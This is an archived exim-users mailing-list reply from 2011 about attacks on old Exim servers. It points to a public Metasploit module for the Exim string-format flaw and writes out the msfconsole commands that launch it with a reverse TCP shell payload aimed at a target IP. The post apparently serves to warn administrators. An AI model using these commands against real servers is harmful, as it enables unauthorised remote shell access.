Re: [exim] Script kiddies?

Top Page
This message is part of the following thread:
M\the complete thread tree sorted by date
MMTed Cooper at <-
Jason W. at ->
Delete this message
Reply to this message
Author: Mike Cardwell
Date:  
To: exim-users
Subject: Re: [exim] Script kiddies?
On 12/01/2011 13:36, Ted Cooper wrote:

> There is the possibility that this has become part of some script kiddie
> exploit kit now so there may be more of these attacks against servers
> running old versions. Luckily it's not very well written and falls over
> fairly quickly.

There's a Metasploit module for it as well:
http://www.metasploit.com/modules/exploit/unix/smtp/exim4_string_format

So exploiting it is as simple as:

1. install Metasploit
2. run Metasploit
3. Type:
use exploit/unix/smtp/exim4_string_format
set payload generic/shell_reverse_tcp
set LHOST my.ip
set RHOST target.ip
exploit

--
Mike Cardwell https://secure.grepular.com/ https://twitter.com/mickeyc
Professional http://cardwellit.com/ http://linkedin.com/in/mikecardwell
PGP.mit.edu 0018461F/35BC AF1D 3AA2 1F84 3DC3 B0CF 70A5 F512 0018 461F

This message was posted to the following mailing lists:
Exim-users
Mailing List Info | Nearby Messages		<-[exim] Script kiddies?[exim] PGP on list->
Tahini and Hummus and Cumin Development Archives administrated by cumin AdminsLurker (version 2.3)